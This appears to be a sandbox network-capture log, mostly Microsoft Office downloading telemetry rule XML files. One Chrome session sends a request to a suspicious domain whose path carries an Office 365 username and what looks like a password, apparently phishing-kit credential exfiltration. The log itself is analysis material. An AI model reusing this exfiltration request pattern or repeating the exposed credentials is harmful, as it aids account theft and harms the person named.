                                                                                                                                                                x-azure-ref: 20241123T193653Z-15b8b599d885ffrhhC1TEBtuv000000003e000000000apr9
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:53 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                52192.168.2.44980813.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:53 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:53 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 471
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                x-ms-request-id: a24720e5-f01e-0096-3f65-3b10ef000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193653Z-178bfbc474bq2pr7hC1NYCkfgg0000000520000000008fh8
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:53 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                53192.168.2.44980687.120.114.1724434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:53 UTC578OUTGET /O365/username/hmoon%40nova.edu/gTZ)sadwg%3Fy3%40tST HTTP/1.1
                                                                                                                                                                Host: nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                Origin: http://nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Sec-WebSocket-Key: apinp6EeVnRODBeoy0GXBg==
                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                2024-11-23 19:36:54 UTC206INHTTP/1.1 400 Bad Request
                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                Sec-Websocket-Version: 13
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:53 GMT
                                                                                                                                                                Content-Length: 148
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-11-23 19:36:54 UTC148INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a 45 72 72 6f 72 20 55 70 67 72 61 64 69 6e 67 20 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 77 65 62 73 6f 63 6b 65 74 3a 20 74 68 65 20 63 6c 69 65 6e 74 20 69 73 20 6e 6f 74 20 75 73 69 6e 67 20 74 68 65 20 77 65 62 73 6f 63 6b 65 74 20 70 72 6f 74 6f 63 6f 6c 3a 20 27 75 70 67 72 61 64 65 27 20 74 6f 6b 65 6e 20 6e 6f 74 20 66 6f 75 6e 64 20 69 6e 20 27 43 6f 6e 6e 65 63 74 69 6f 6e 27 20 68 65 61 64 65 72 0a
                                                                                                                                                                Data Ascii: Bad RequestError Upgrading Connection: websocket: the client is not using the websocket protocol: 'upgrade' token not found in 'Connection' header


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                54192.168.2.44980913.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:53 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:53 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 419
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                x-ms-request-id: bd408748-301e-0052-28b9-3d65d6000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193653Z-15b8b599d886w4hzhC1TEBb4ug00000003eg000000008e93
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:53 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                55192.168.2.44981013.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:53 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:53 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 494
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                ETag: "0x8DC582BB8972972"
                                                                                                                                                                x-ms-request-id: 52ac3eb7-c01e-0079-7e4e-3ce51a000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193653Z-15b8b599d882hxlwhC1TEBfa5w000000036000000000ga01
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:54 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                56192.168.2.44981213.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:55 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:55 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 472
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                ETag: "0x8DC582B9D43097E"
                                                                                                                                                                x-ms-request-id: a7e2d1bd-a01e-0032-531b-3d1949000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193655Z-178bfbc474bbcwv4hC1NYCypys00000004tg000000006kwv
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:55 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                57192.168.2.44981113.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:55 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:55 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 420
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193655Z-178bfbc474bw8bwphC1NYC38b400000004u000000000411b
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:55 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                58192.168.2.44981313.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:55 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:56 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 427
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                ETag: "0x8DC582BA909FA21"
                                                                                                                                                                x-ms-request-id: 16d74281-d01e-0066-164b-3cea17000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193655Z-15b8b599d882l6clhC1TEBxd5c000000037000000000dz6z
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:56 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                59192.168.2.44981413.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:55 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:56 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 486
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                ETag: "0x8DC582B92FCB436"
                                                                                                                                                                x-ms-request-id: 95b9e869-801e-008c-3081-3b7130000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193656Z-174c587ffdf9xbcchC1TEBxkz4000000034g00000000ncbr
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:56 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                60192.168.2.44981513.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:55 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:56 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 423
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                x-ms-request-id: d83ea369-501e-000a-040c-3d0180000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193656Z-178bfbc474bpscmfhC1NYCfc2c00000003kg000000002emx
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:56 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                61192.168.2.44981613.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:57 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:57 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 478
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                ETag: "0x8DC582B9B233827"
                                                                                                                                                                x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193657Z-174c587ffdf8fcgwhC1TEBnn7000000003dg00000000sxrn
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
